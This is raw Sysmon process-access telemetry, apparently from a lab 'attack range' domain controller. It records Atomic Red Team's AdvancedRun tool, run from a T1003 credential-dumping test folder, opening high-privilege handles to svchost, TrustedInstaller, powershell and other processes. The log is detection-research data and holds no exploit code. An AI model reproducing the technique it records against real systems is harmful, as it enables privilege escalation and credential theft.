17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 